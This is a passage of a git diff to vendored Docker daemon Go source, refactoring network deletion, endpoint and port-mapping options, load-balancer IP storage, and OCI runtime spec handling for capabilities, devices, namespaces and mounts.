-	return daemon.deleteNetwork(networkID, true)
+	n, err := daemon.GetNetworkByID(networkID)
+	if err != nil {
+		return err
+	}
+	return daemon.deleteNetwork(n, true)
 }
 
 // DeleteNetwork destroys a network unless it's one of docker's predefined networks.
 func (daemon *Daemon) DeleteNetwork(networkID string) error {
-	return daemon.deleteNetwork(networkID, false)
-}
-
-func (daemon *Daemon) deleteNetwork(networkID string, dynamic bool) error {
-	nw, err := daemon.FindNetwork(networkID)
+	n, err := daemon.GetNetworkByID(networkID)
 	if err != nil {
 		return err
 	}
+	return daemon.deleteNetwork(n, false)
+}
 
+func (daemon *Daemon) deleteLoadBalancerSandbox(n libnetwork.Network) {
+	controller := daemon.netController
+
+	//The only endpoint left should be the LB endpoint (nw.Name() + "-endpoint")
+	endpoints := n.Endpoints()
+	if len(endpoints) == 1 {
+		sandboxName := n.Name() + "-sbox"
+
+		info := endpoints[0].Info()
+		if info != nil {
+			sb := info.Sandbox()
+			if sb != nil {
+				if err := sb.DisableService(); err != nil {
+					logrus.Warnf("Failed to disable service on sandbox %s: %v", sandboxName, err)
+					//Ignore error and attempt to delete the load balancer endpoint
+				}
+			}
+		}
+
+		if err := endpoints[0].Delete(true); err != nil {
+			logrus.Warnf("Failed to delete endpoint %s (%s) in %s: %v", endpoints[0].Name(), endpoints[0].ID(), sandboxName, err)
+			//Ignore error and attempt to delete the sandbox.
+		}
+
+		if err := controller.SandboxDestroy(sandboxName); err != nil {
+			logrus.Warnf("Failed to delete %s sandbox: %v", sandboxName, err)
+			//Ignore error and attempt to delete the network.
+		}
+	}
+}
+
+func (daemon *Daemon) deleteNetwork(nw libnetwork.Network, dynamic bool) error {
 	if runconfig.IsPreDefinedNetwork(nw.Name()) && !dynamic {
 		err := fmt.Errorf("%s is a pre-defined network and cannot be removed", nw.Name())
-		return apierrors.NewRequestForbiddenError(err)
+		return errdefs.Forbidden(err)
+	}
+
+	if dynamic && !nw.Info().Dynamic() {
+		if runconfig.IsPreDefinedNetwork(nw.Name()) {
+			// Predefined networks now support swarm services. Make this
+			// a no-op when cluster requests to remove the predefined network.
+			return nil
+		}
+		err := fmt.Errorf("%s is not a dynamic network", nw.Name())
+		return errdefs.Forbidden(err)
 	}
 
 	if err := nw.Delete(); err != nil {
 		return err
 	}
-	daemon.pluginRefCount(nw.Type(), driverapi.NetworkPluginEndpointType, plugingetter.RELEASE)
-	ipamType, _, _, _ := nw.Info().IpamConfig()
-	daemon.pluginRefCount(ipamType, ipamapi.PluginEndpointType, plugingetter.RELEASE)
-	daemon.LogNetworkEvent(nw, "destroy")
+
+	// If this is not a configuration only network, we need to
+	// update the corresponding remote drivers' reference counts
+	if !nw.Info().ConfigOnly() {
+		daemon.pluginRefCount(nw.Type(), driverapi.NetworkPluginEndpointType, plugingetter.Release)
+		ipamType, _, _, _ := nw.Info().IpamConfig()
+		daemon.pluginRefCount(ipamType, ipamapi.PluginEndpointType, plugingetter.Release)
+		daemon.LogNetworkEvent(nw, "destroy")
+	}
+
 	return nil
 }
 
@@ -472,7 +583,7 @@ func (daemon *Daemon) GetNetworks() []libnetwork.Network {
 // clearAttachableNetworks removes the attachable networks
 // after disconnecting any connected container
 func (daemon *Daemon) clearAttachableNetworks() {
-	for _, n := range daemon.GetNetworks() {
+	for _, n := range daemon.getAllNetworks() {
 		if !n.Info().Attachable() {
 			continue
 		}
@@ -496,3 +607,312 @@ func (daemon *Daemon) clearAttachableNetworks() {
 		}
 	}
 }
+
+// buildCreateEndpointOptions builds endpoint options from a given network.
+func buildCreateEndpointOptions(c *container.Container, n libnetwork.Network, epConfig *network.EndpointSettings, sb libnetwork.Sandbox, daemonDNS []string) ([]libnetwork.EndpointOption, error) {
+	var (
+		bindings      = make(nat.PortMap)
+		pbList        []networktypes.PortBinding
+		exposeList    []networktypes.TransportPort
+		createOptions []libnetwork.EndpointOption
+	)
+
+	defaultNetName := runconfig.DefaultDaemonNetworkMode().NetworkName()
+
+	if (!c.EnableServiceDiscoveryOnDefaultNetwork() && n.Name() == defaultNetName) ||
+		c.NetworkSettings.IsAnonymousEndpoint {
+		createOptions = append(createOptions, libnetwork.CreateOptionAnonymous())
+	}
+
+	if epConfig != nil {
+		ipam := epConfig.IPAMConfig
+
+		if ipam != nil {
+			var (
+				ipList          []net.IP
+				ip, ip6, linkip net.IP
+			)
+
+			for _, ips := range ipam.LinkLocalIPs {
+				if linkip = net.ParseIP(ips); linkip == nil && ips != "" {
+					return nil, errors.Errorf("Invalid link-local IP address: %s", ipam.LinkLocalIPs)
+				}
+				ipList = append(ipList, linkip)
+
+			}
+
+			if ip = net.ParseIP(ipam.IPv4Address); ip == nil && ipam.IPv4Address != "" {
+				return nil, errors.Errorf("Invalid IPv4 address: %s)", ipam.IPv4Address)
+			}
+
+			if ip6 = net.ParseIP(ipam.IPv6Address); ip6 == nil && ipam.IPv6Address != "" {
+				return nil, errors.Errorf("Invalid IPv6 address: %s)", ipam.IPv6Address)
+			}
+
+			createOptions = append(createOptions,
+				libnetwork.CreateOptionIpam(ip, ip6, ipList, nil))
+
+		}
+
+		for _, alias := range epConfig.Aliases {
+			createOptions = append(createOptions, libnetwork.CreateOptionMyAlias(alias))
+		}
+		for k, v := range epConfig.DriverOpts {
+			createOptions = append(createOptions, libnetwork.EndpointOptionGeneric(options.Generic{k: v}))
+		}
+	}
+
+	if c.NetworkSettings.Service != nil {
+		svcCfg := c.NetworkSettings.Service
+
+		var vip string
+		if svcCfg.VirtualAddresses[n.ID()] != nil {
+			vip = svcCfg.VirtualAddresses[n.ID()].IPv4
+		}
+
+		var portConfigs []*libnetwork.PortConfig
+		for _, portConfig := range svcCfg.ExposedPorts {
+			portConfigs = append(portConfigs, &libnetwork.PortConfig{
+				Name:          portConfig.Name,
+				Protocol:      libnetwork.PortConfig_Protocol(portConfig.Protocol),
+				TargetPort:    portConfig.TargetPort,
+				PublishedPort: portConfig.PublishedPort,
+			})
+		}
+
+		createOptions = append(createOptions, libnetwork.CreateOptionService(svcCfg.Name, svcCfg.ID, net.ParseIP(vip), portConfigs, svcCfg.Aliases[n.ID()]))
+	}
+
+	if !containertypes.NetworkMode(n.Name()).IsUserDefined() {
+		createOptions = append(createOptions, libnetwork.CreateOptionDisableResolution())
+	}
+
+	// configs that are applicable only for the endpoint in the network
+	// to which container was connected to on docker run.
+	// Ideally all these network-specific endpoint configurations must be moved under
+	// container.NetworkSettings.Networks[n.Name()]
+	if n.Name() == c.HostConfig.NetworkMode.NetworkName() ||
+		(n.Name() == defaultNetName && c.HostConfig.NetworkMode.IsDefault()) {
+		if c.Config.MacAddress != "" {
+			mac, err := net.ParseMAC(c.Config.MacAddress)
+			if err != nil {
+				return nil, err
+			}
+
+			genericOption := options.Generic{
+				netlabel.MacAddress: mac,
+			}
+
+			createOptions = append(createOptions, libnetwork.EndpointOptionGeneric(genericOption))
+		}
+
+	}
+
+	// Port-mapping rules belong to the container & applicable only to non-internal networks
+	portmaps := getSandboxPortMapInfo(sb)
+	if n.Info().Internal() || len(portmaps) > 0 {
+		return createOptions, nil
+	}
+
+	if c.HostConfig.PortBindings != nil {
+		for p, b := range c.HostConfig.PortBindings {
+			bindings[p] = []nat.PortBinding{}
+			for _, bb := range b {
+				bindings[p] = append(bindings[p], nat.PortBinding{
+					HostIP:   bb.HostIP,
+					HostPort: bb.HostPort,
+				})
+			}
+		}
+	}
+
+	portSpecs := c.Config.ExposedPorts
+	ports := make([]nat.Port, len(portSpecs))
+	var i int
+	for p := range portSpecs {
+		ports[i] = p
+		i++
+	}
+	nat.SortPortMap(ports, bindings)
+	for _, port := range ports {
+		expose := networktypes.TransportPort{}
+		expose.Proto = networktypes.ParseProtocol(port.Proto())
+		expose.Port = uint16(port.Int())
+		exposeList = append(exposeList, expose)
+
+		pb := networktypes.PortBinding{Port: expose.Port, Proto: expose.Proto}
+		binding := bindings[port]
+		for i := 0; i < len(binding); i++ {
+			pbCopy := pb.GetCopy()
+			newP, err := nat.NewPort(nat.SplitProtoPort(binding[i].HostPort))
+			var portStart, portEnd int
+			if err == nil {
+				portStart, portEnd, err = newP.Range()
+			}
+			if err != nil {
+				return nil, errors.Wrapf(err, "Error parsing HostPort value (%s)", binding[i].HostPort)
+			}
+			pbCopy.HostPort = uint16(portStart)
+			pbCopy.HostPortEnd = uint16(portEnd)
+			pbCopy.HostIP = net.ParseIP(binding[i].HostIP)
+			pbList = append(pbList, pbCopy)
+		}
+
+		if c.HostConfig.PublishAllPorts && len(binding) == 0 {
+			pbList = append(pbList, pb)
+		}
+	}
+
+	var dns []string
+
+	if len(c.HostConfig.DNS) > 0 {
+		dns = c.HostConfig.DNS
+	} else if len(daemonDNS) > 0 {
+		dns = daemonDNS
+	}
+
+	if len(dns) > 0 {
+		createOptions = append(createOptions,
+			libnetwork.CreateOptionDNS(dns))
+	}
+
+	createOptions = append(createOptions,
+		libnetwork.CreateOptionPortMapping(pbList),
+		libnetwork.CreateOptionExposedPorts(exposeList))
+
+	return createOptions, nil
+}
+
+// getEndpointInNetwork returns the container's endpoint to the provided network.
+func getEndpointInNetwork(name string, n libnetwork.Network) (libnetwork.Endpoint, error) {
+	endpointName := strings.TrimPrefix(name, "/")
+	return n.EndpointByName(endpointName)
+}
+
+// getSandboxPortMapInfo retrieves the current port-mapping programmed for the given sandbox
+func getSandboxPortMapInfo(sb libnetwork.Sandbox) nat.PortMap {
+	pm := nat.PortMap{}
+	if sb == nil {
+		return pm
+	}
+
+	for _, ep := range sb.Endpoints() {
+		pm, _ = getEndpointPortMapInfo(ep)
+		if len(pm) > 0 {
+			break
+		}
+	}
+	return pm
+}
+
+func getEndpointPortMapInfo(ep libnetwork.Endpoint) (nat.PortMap, error) {
+	pm := nat.PortMap{}
+	driverInfo, err := ep.DriverInfo()
+	if err != nil {
+		return pm, err
+	}
+
+	if driverInfo == nil {
+		// It is not an error for epInfo to be nil
+		return pm, nil
+	}
+
+	if expData, ok := driverInfo[netlabel.ExposedPorts]; ok {
+		if exposedPorts, ok := expData.([]networktypes.TransportPort); ok {
+			for _, tp := range exposedPorts {
+				natPort, err := nat.NewPort(tp.Proto.String(), strconv.Itoa(int(tp.Port)))
+				if err != nil {
+					return pm, fmt.Errorf("Error parsing Port value(%v):%v", tp.Port, err)
+				}
+				pm[natPort] = nil
+			}
+		}
+	}
+
+	mapData, ok := driverInfo[netlabel.PortMap]
+	if !ok {
+		return pm, nil
+	}
+
+	if portMapping, ok := mapData.([]networktypes.PortBinding); ok {
+		for _, pp := range portMapping {
+			natPort, err := nat.NewPort(pp.Proto.String(), strconv.Itoa(int(pp.Port)))
+			if err != nil {
+				return pm, err
+			}
+			natBndg := nat.PortBinding{HostIP: pp.HostIP.String(), HostPort: strconv.Itoa(int(pp.HostPort))}
+			pm[natPort] = append(pm[natPort], natBndg)
+		}
+	}
+
+	return pm, nil
+}
+
+// buildEndpointInfo sets endpoint-related fields on container.NetworkSettings based on the provided network and endpoint.
+func buildEndpointInfo(networkSettings *internalnetwork.Settings, n libnetwork.Network, ep libnetwork.Endpoint) error {
+	if ep == nil {
+		return errors.New("endpoint cannot be nil")
+	}
+
+	if networkSettings == nil {
+		return errors.New("network cannot be nil")
+	}
+
+	epInfo := ep.Info()
+	if epInfo == nil {
+		// It is not an error to get an empty endpoint info
+		return nil
+	}
+
+	if _, ok := networkSettings.Networks[n.Name()]; !ok {
+		networkSettings.Networks[n.Name()] = &internalnetwork.EndpointSettings{
+			EndpointSettings: &network.EndpointSettings{},
+		}
+	}
+	networkSettings.Networks[n.Name()].NetworkID = n.ID()
+	networkSettings.Networks[n.Name()].EndpointID = ep.ID()
+
+	iface := epInfo.Iface()
+	if iface == nil {
+		return nil
+	}
+
+	if iface.MacAddress() != nil {
+		networkSettings.Networks[n.Name()].MacAddress = iface.MacAddress().String()
+	}
+
+	if iface.Address() != nil {
+		ones, _ := iface.Address().Mask.Size()
+		networkSettings.Networks[n.Name()].IPAddress = iface.Address().IP.String()
+		networkSettings.Networks[n.Name()].IPPrefixLen = ones
+	}
+
+	if iface.AddressIPv6() != nil && iface.AddressIPv6().IP.To16() != nil {
+		onesv6, _ := iface.AddressIPv6().Mask.Size()
+		networkSettings.Networks[n.Name()].GlobalIPv6Address = iface.AddressIPv6().IP.String()
+		networkSettings.Networks[n.Name()].GlobalIPv6PrefixLen = onesv6
+	}
+
+	return nil
+}
+
+// buildJoinOptions builds endpoint Join options from a given network.
+func buildJoinOptions(networkSettings *internalnetwork.Settings, n interface {
+	Name() string
+}) ([]libnetwork.EndpointOption, error) {
+	var joinOptions []libnetwork.EndpointOption
+	if epConfig, ok := networkSettings.Networks[n.Name()]; ok {
+		for _, str := range epConfig.Links {
+			name, alias, err := opts.ParseLink(str)
+			if err != nil {
+				return nil, err
+			}
+			joinOptions = append(joinOptions, libnetwork.CreateOptionAlias(name, alias))
+		}
+		for k, v := range epConfig.DriverOpts {
+			joinOptions = append(joinOptions, libnetwork.EndpointOptionGeneric(options.Generic{k: v}))
+		}
+	}
+
+	return joinOptions, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/network/settings.go b/vendor/github.com/docker/docker/daemon/network/settings.go
index 8f6b7dd59e..b0460ed6ae 100644
--- a/vendor/github.com/docker/docker/daemon/network/settings.go
+++ b/vendor/github.com/docker/docker/daemon/network/settings.go
@@ -1,9 +1,12 @@
-package network
+package network // import "github.com/docker/docker/daemon/network"
 
 import (
+	"net"
+
 	networktypes "github.com/docker/docker/api/types/network"
 	clustertypes "github.com/docker/docker/daemon/cluster/provider"
 	"github.com/docker/go-connections/nat"
+	"github.com/pkg/errors"
 )
 
 // Settings stores configuration details about the daemon network config
@@ -31,3 +34,36 @@ type EndpointSettings struct {
 	*networktypes.EndpointSettings
 	IPAMOperational bool
 }
+
+// AttachmentStore stores the load balancer IP address for a network id.
+type AttachmentStore struct {
+	//key: networkd id
+	//value: load balancer ip address
+	networkToNodeLBIP map[string]net.IP
+}
+
+// ResetAttachments clears any existing load balancer IP to network mapping and
+// sets the mapping to the given attachments.
+func (store *AttachmentStore) ResetAttachments(attachments map[string]string) error {
+	store.ClearAttachments()
+	for nid, nodeIP := range attachments {
+		ip, _, err := net.ParseCIDR(nodeIP)
+		if err != nil {
+			store.networkToNodeLBIP = make(map[string]net.IP)
+			return errors.Wrapf(err, "Failed to parse load balancer address %s", nodeIP)
+		}
+		store.networkToNodeLBIP[nid] = ip
+	}
+	return nil
+}
+
+// ClearAttachments clears all the mappings of network to load balancer IP Address.
+func (store *AttachmentStore) ClearAttachments() {
+	store.networkToNodeLBIP = make(map[string]net.IP)
+}
+
+// GetIPForNetwork return the load balancer IP address for the given network.
+func (store *AttachmentStore) GetIPForNetwork(networkID string) (net.IP, bool) {
+	ip, exists := store.networkToNodeLBIP[networkID]
+	return ip, exists
+}
diff --git a/vendor/github.com/docker/docker/daemon/oci.go b/vendor/github.com/docker/docker/daemon/oci.go
new file mode 100644
index 0000000000..52050e24fa
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/oci.go
@@ -0,0 +1,78 @@
+package daemon // import "github.com/docker/docker/daemon"
+
+import (
+	"fmt"
+	"regexp"
+	"strconv"
+
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/daemon/caps"
+	specs "github.com/opencontainers/runtime-spec/specs-go"
+)
+
+// nolint: gosimple
+var (
+	deviceCgroupRuleRegex = regexp.MustCompile("^([acb]) ([0-9]+|\\*):([0-9]+|\\*) ([rwm]{1,3})$")
+)
+
+func setCapabilities(s *specs.Spec, c *container.Container) error {
+	var caplist []string
+	var err error
+	if c.HostConfig.Privileged {
+		caplist = caps.GetAllCapabilities()
+	} else {
+		caplist, err = caps.TweakCapabilities(s.Process.Capabilities.Bounding, c.HostConfig.CapAdd, c.HostConfig.CapDrop)
+		if err != nil {
+			return err
+		}
+	}
+	s.Process.Capabilities.Effective = caplist
+	s.Process.Capabilities.Bounding = caplist
+	s.Process.Capabilities.Permitted = caplist
+	s.Process.Capabilities.Inheritable = caplist
+	// setUser has already been executed here
+	// if non root drop capabilities in the way execve does
+	if s.Process.User.UID != 0 {
+		s.Process.Capabilities.Effective = []string{}
+		s.Process.Capabilities.Permitted = []string{}
+	}
+	return nil
+}
+
+func appendDevicePermissionsFromCgroupRules(devPermissions []specs.LinuxDeviceCgroup, rules []string) ([]specs.LinuxDeviceCgroup, error) {
+	for _, deviceCgroupRule := range rules {
+		ss := deviceCgroupRuleRegex.FindAllStringSubmatch(deviceCgroupRule, -1)
+		if len(ss[0]) != 5 {
+			return nil, fmt.Errorf("invalid device cgroup rule format: '%s'", deviceCgroupRule)
+		}
+		matches := ss[0]
+
+		dPermissions := specs.LinuxDeviceCgroup{
+			Allow:  true,
+			Type:   matches[1],
+			Access: matches[4],
+		}
+		if matches[2] == "*" {
+			major := int64(-1)
+			dPermissions.Major = &major
+		} else {
+			major, err := strconv.ParseInt(matches[2], 10, 64)
+			if err != nil {
+				return nil, fmt.Errorf("invalid major value in device cgroup rule format: '%s'", deviceCgroupRule)
+			}
+			dPermissions.Major = &major
+		}
+		if matches[3] == "*" {
+			minor := int64(-1)
+			dPermissions.Minor = &minor
+		} else {
+			minor, err := strconv.ParseInt(matches[3], 10, 64)
+			if err != nil {
+				return nil, fmt.Errorf("invalid minor value in device cgroup rule format: '%s'", deviceCgroupRule)
+			}
+			dPermissions.Minor = &minor
+		}
+		devPermissions = append(devPermissions, dPermissions)
+	}
+	return devPermissions, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/oci_linux.go b/vendor/github.com/docker/docker/daemon/oci_linux.go
index a72b0b873d..6fb7a26dcb 100644
--- a/vendor/github.com/docker/docker/daemon/oci_linux.go
+++ b/vendor/github.com/docker/docker/daemon/oci_linux.go
@@ -1,4 +1,4 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
 	"fmt"
@@ -10,21 +10,21 @@ import (
 	"strconv"
 	"strings"
 
-	"github.com/Sirupsen/logrus"
 	containertypes "github.com/docker/docker/api/types/container"
 	"github.com/docker/docker/container"
-	"github.com/docker/docker/daemon/caps"
+	daemonconfig "github.com/docker/docker/daemon/config"
 	"github.com/docker/docker/oci"
 	"github.com/docker/docker/pkg/idtools"
 	"github.com/docker/docker/pkg/mount"
-	"github.com/docker/docker/pkg/stringutils"
-	"github.com/docker/docker/pkg/symlink"
-	"github.com/docker/docker/volume"
+	volumemounts "github.com/docker/docker/volume/mounts"
 	"github.com/opencontainers/runc/libcontainer/apparmor"
 	"github.com/opencontainers/runc/libcontainer/cgroups"
 	"github.com/opencontainers/runc/libcontainer/devices"
 	"github.com/opencontainers/runc/libcontainer/user"
-	specs "github.com/opencontainers/runtime-spec/specs-go"
+	"github.com/opencontainers/runtime-spec/specs-go"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
+	"golang.org/x/sys/unix"
 )
 
 func setResources(s *specs.Spec, r containertypes.Resources) error {
@@ -50,13 +50,16 @@ func setResources(s *specs.Spec, r containertypes.Resources) error {
 	}
 
 	memoryRes := getMemoryResources(r)
-	cpuRes := getCPUResources(r)
+	cpuRes, err := getCPUResources(r)
+	if err != nil {
+		return err
+	}
 	blkioWeight := r.BlkioWeight
 
-	specResources := &specs.Resources{
+	specResources := &specs.LinuxResources{
 		Memory: memoryRes,
 		CPU:    cpuRes,
-		BlockIO: &specs.BlockIO{
+		BlockIO: &specs.LinuxBlockIO{
 			Weight:                  &blkioWeight,
 			WeightDevice:            weightDevices,
 			ThrottleReadBpsDevice:   readBpsDevice,
@@ -64,9 +67,8 @@ func setResources(s *specs.Spec, r containertypes.Resources) error {
 			ThrottleReadIOPSDevice:  readIOpsDevice,
 			ThrottleWriteIOPSDevice: writeIOpsDevice,
 		},
-		DisableOOMKiller: r.OomKillDisable,
-		Pids: &specs.Pids{
-			Limit: &r.PidsLimit,
+		Pids: &specs.LinuxPids{
+			Limit: r.PidsLimit,
 		},
 	}
 
@@ -80,7 +82,7 @@ func setResources(s *specs.Spec, r containertypes.Resources) error {
 
 func setDevices(s *specs.Spec, c *container.Container) error {
 	// Build lists of devices allowed and created within the container.
-	var devs []specs.Device
+	var devs []specs.LinuxDevice
 	devPermissions := s.Linux.Resources.Devices
 	if c.HostConfig.Privileged {
 		hostDevices, err := devices.HostDevices()
@@ -90,11 +92,10 @@ func setDevices(s *specs.Spec, c *container.Container) error {
 		for _, d := range hostDevices {
 			devs = append(devs, oci.Device(d))
 		}
-		rwm := "rwm"
-		devPermissions = []specs.DeviceCgroup{
+		devPermissions = []specs.LinuxDeviceCgroup{
 			{
 				Allow:  true,
-				Access: &rwm,
+				Access: "rwm",
 			},
 		}
 	} else {
@@ -106,6 +107,12 @@ func setDevices(s *specs.Spec, c *container.Container) error {
 			devs = append(devs, d...)
 			devPermissions = append(devPermissions, dPermissions...)
 		}
+
+		var err error
+		devPermissions, err = appendDevicePermissionsFromCgroupRules(devPermissions, c.HostConfig.DeviceCgroupRules)
+		if err != nil {
+			return err
+		}
 	}
 
 	s.Linux.Devices = append(s.Linux.Devices, devs...)
@@ -113,15 +120,15 @@ func setDevices(s *specs.Spec, c *container.Container) error {
 	return nil
 }
 
-func setRlimits(daemon *Daemon, s *specs.Spec, c *container.Container) error {
-	var rlimits []specs.Rlimit
+func (daemon *Daemon) setRlimits(s *specs.Spec, c *container.Container) error {
+	var rlimits []specs.POSIXRlimit
 
 	// We want to leave the original HostConfig alone so make a copy here
 	hostConfig := *c.HostConfig
 	// Merge with the daemon defaults
 	daemon.mergeUlimits(&hostConfig)
 	for _, ul := range hostConfig.Ulimits {
-		rlimits = append(rlimits, specs.Rlimit{
+		rlimits = append(rlimits, specs.POSIXRlimit{
 			Type: "RLIMIT_" + strings.ToUpper(ul.Name),
 			Soft: uint64(ul.Soft),
 			Hard: uint64(ul.Hard),
@@ -144,7 +151,7 @@ func setUser(s *specs.Spec, c *container.Container) error {
 }
 
 func readUserFile(c *container.Container, p string) (io.ReadCloser, error) {
-	fp, err := symlink.FollowSymlinkInScope(filepath.Join(c.BaseFS, p), c.BaseFS)
+	fp, err := c.GetResourcePath(p)
 	if err != nil {
 		return nil, err
 	}
@@ -196,7 +203,7 @@ func getUser(c *container.Container, username string) (uint32, uint32, []uint32,
 	return uid, gid, additionalGids, nil
 }
 
-func setNamespace(s *specs.Spec, ns specs.Namespace) {
+func setNamespace(s *specs.Spec, ns specs.LinuxNamespace) {
 	for i, n := range s.Linux.Namespaces {
 		if n.Type == ns.Type {
 			s.Linux.Namespaces[i] = ns
@@ -206,37 +213,22 @@ func setNamespace(s *specs.Spec, ns specs.Namespace) {
 	s.Linux.Namespaces = append(s.Linux.Namespaces, ns)
 }
 
-func setCapabilities(s *specs.Spec, c *container.Container) error {
-	var caplist []string
-	var err error
-	if c.HostConfig.Privileged {
-		caplist = caps.GetAllCapabilities()
-	} else {
-		caplist, err = caps.TweakCapabilities(s.Process.Capabilities, c.HostConfig.CapAdd, c.HostConfig.CapDrop)
-		if err != nil {
-			return err
-		}
-	}
-	s.Process.Capabilities = caplist
-	return nil
-}
-
 func setNamespaces(daemon *Daemon, s *specs.Spec, c *container.Container) error {
 	userNS := false
 	// user
 	if c.HostConfig.UsernsMode.IsPrivate() {
-		uidMap, gidMap := daemon.GetUIDGIDMaps()
+		uidMap := daemon.idMappings.UIDs()
 		if uidMap != nil {
 			userNS = true
-			ns := specs.Namespace{Type: "user"}
+			ns := specs.LinuxNamespace{Type: "user"}
 			setNamespace(s, ns)
 			s.Linux.UIDMappings = specMapping(uidMap)
-			s.Linux.GIDMappings = specMapping(gidMap)
+			s.Linux.GIDMappings = specMapping(daemon.idMappings.GIDs())
 		}
 	}
 	// network
 	if !c.Config.NetworkDisabled {
-		ns := specs.Namespace{Type: "network"}
+		ns := specs.LinuxNamespace{Type: "network"}
 		parts := strings.SplitN(string(c.HostConfig.NetworkMode), ":", 2)
 		if parts[0] == "container" {
 			nc, err := daemon.getNetworkedContainer(c.ID, c.HostConfig.NetworkMode.ConnectedContainer())
@@ -246,7 +238,7 @@ func setNamespaces(daemon *Daemon, s *specs.Spec, c *container.Container) error
 			ns.Path = fmt.Sprintf("/proc/%d/ns/net", nc.State.GetPID())
 			if userNS {
 				// to share a net namespace, they must also share a user namespace
-				nsUser := specs.Namespace{Type: "user"}
+				nsUser := specs.LinuxNamespace{Type: "user"}
 				nsUser.Path = fmt.Sprintf("/proc/%d/ns/user", nc.State.GetPID())
 				setNamespace(s, nsUser)
 			}
@@ -255,10 +247,13 @@ func setNamespaces(daemon *Daemon, s *specs.Spec, c *container.Container) error
 		}
 		setNamespace(s, ns)
 	}
+
 	// ipc
-	if c.HostConfig.IpcMode.IsContainer() {
-		ns := specs.Namespace{Type: "ipc"}
-		ic, err := daemon.getIpcContainer(c)
+	ipcMode := c.HostConfig.IpcMode
+	switch {
+	case ipcMode.IsContainer():
+		ns := specs.LinuxNamespace{Type: "ipc"}
+		ic, err := daemon.getIpcContainer(ipcMode.Container())
 		if err != nil {
 			return err
 		}
@@ -266,19 +261,26 @@ func setNamespaces(daemon *Daemon, s *specs.Spec, c *container.Container) error
 		setNamespace(s, ns)
 		if userNS {
 			// to share an IPC namespace, they must also share a user namespace
-			nsUser := specs.Namespace{Type: "user"}
+			nsUser := specs.LinuxNamespace{Type: "user"}
 			nsUser.Path = fmt.Sprintf("/proc/%d/ns/user", ic.State.GetPID())
 			setNamespace(s, nsUser)
 		}
-	} else if c.HostConfig.IpcMode.IsHost() {
-		oci.RemoveNamespace(s, specs.NamespaceType("ipc"))
-	} else {
-		ns := specs.Namespace{Type: "ipc"}
+	case ipcMode.IsHost():
+		oci.RemoveNamespace(s, specs.LinuxNamespaceType("ipc"))
+	case ipcMode.IsEmpty():
+		// A container was created by an older version of the daemon.
+		// The default behavior used to be what is now called "shareable".
+		fallthrough
+	case ipcMode.IsPrivate(), ipcMode.IsShareable(), ipcMode.IsNone():
+		ns := specs.LinuxNamespace{Type: "ipc"}
 		setNamespace(s, ns)
+	default:
+		return fmt.Errorf("Invalid IPC mode: %v", ipcMode)
 	}
+
 	// pid
 	if c.HostConfig.PidMode.IsContainer() {
-		ns := specs.Namespace{Type: "pid"}
+		ns := specs.LinuxNamespace{Type: "pid"}
 		pc, err := daemon.getPidContainer(c)
 		if err != nil {
 			return err
@@ -287,29 +289,29 @@ func setNamespaces(daemon *Daemon, s *specs.Spec, c *container.Container) error
 		setNamespace(s, ns)
 		if userNS {
 			// to share a PID namespace, they must also share a user namespace
-			nsUser := specs.Namespace{Type: "user"}
+			nsUser := specs.LinuxNamespace{Type: "user"}
 			nsUser.Path = fmt.Sprintf("/proc/%d/ns/user", pc.State.GetPID())
 			setNamespace(s, nsUser)
 		}
 	} else if c.HostConfig.PidMode.IsHost() {
-		oci.RemoveNamespace(s, specs.NamespaceType("pid"))
+		oci.RemoveNamespace(s, specs.LinuxNamespaceType("pid"))
 	} else {
-		ns := specs.Namespace{Type: "pid"}
+		ns := specs.LinuxNamespace{Type: "pid"}
 		setNamespace(s, ns)
 	}
 	// uts
 	if c.HostConfig.UTSMode.IsHost() {
-		oci.RemoveNamespace(s, specs.NamespaceType("uts"))
+		oci.RemoveNamespace(s, specs.LinuxNamespaceType("uts"))
 		s.Hostname = ""
 	}
 
 	return nil
 }
 
-func specMapping(s []idtools.IDMap) []specs.IDMapping {
-	var ids []specs.IDMapping
+func specMapping(s []idtools.IDMap) []specs.LinuxIDMapping {
+	var ids []specs.LinuxIDMapping
 	for _, item := range s {
-		ids = append(ids, specs.IDMapping{
+		ids = append(ids, specs.LinuxIDMapping{
 			HostID:      uint32(item.HostID),
 			ContainerID: uint32(item.ContainerID),
 			Size:        uint32(item.Size),
@@ -318,15 +320,6 @@ func specMapping(s []idtools.IDMap) []specs.IDMapping {
 	return ids
 }
 
-func getMountInfo(mountinfo []*mount.Info, dir string) *mount.Info {
-	for _, m := range mountinfo {
-		if m.Mountpoint == dir {
-			return m
-		}
-	}
-	return nil
-}
-
 // Get the source mount point of directory passed in as argument. Also return
 // optional fields.
 func getSourceMount(source string) (string, string, error) {
@@ -336,84 +329,101 @@ func getSourceMount(source string) (string, string, error) {
 		return "", "", err
 	}
 
-	mountinfos, err := mount.GetMounts()
+	mi, err := mount.GetMounts(mount.ParentsFilter(sourcePath))
 	if err != nil {
 		return "", "", err
 	}
-
-	mountinfo := getMountInfo(mountinfos, sourcePath)
-	if mountinfo != nil {
-		return sourcePath, mountinfo.Optional, nil
+	if len(mi) < 1 {
+		return "", "", fmt.Errorf("Can't find mount point of %s", source)
 	}
 
-	path := sourcePath
-	for {
-		path = filepath.Dir(path)
-
-		mountinfo = getMountInfo(mountinfos, path)
-		if mountinfo != nil {
-			return path, mountinfo.Optional, nil
+	// find the longest mount point
+	var idx, maxlen int
+	for i := range mi {
+		if len(mi[i].Mountpoint) > maxlen {
+			maxlen = len(mi[i].Mountpoint)
+			idx = i
 		}
+	}
+	return mi[idx].Mountpoint, mi[idx].Optional, nil
+}
+
+const (
+	sharedPropagationOption = "shared:"
+	slavePropagationOption  = "master:"
+)
 
-		if path == "/" {
-			break
+// hasMountinfoOption checks if any of the passed any of the given option values
+// are set in the passed in option string.
+func hasMountinfoOption(opts string, vals ...string) bool {
+	for _, opt := range strings.Split(opts, " ") {
+		for _, val := range vals {
+			if strings.HasPrefix(opt, val) {
+				return true
+			}
 		}
 	}
-
-	// If we are here, we did not find parent mount. Something is wrong.
-	return "", "", fmt.Errorf("Could not find source mount of %s", source)
+	return false
 }
 
 // Ensure mount point on which path is mounted, is shared.
 func ensureShared(path string) error {
-	sharedMount := false
-
 	sourceMount, optionalOpts, err := getSourceMount(path)
 	if err != nil {
 		return err
 	}
 	// Make sure source mount point is shared.
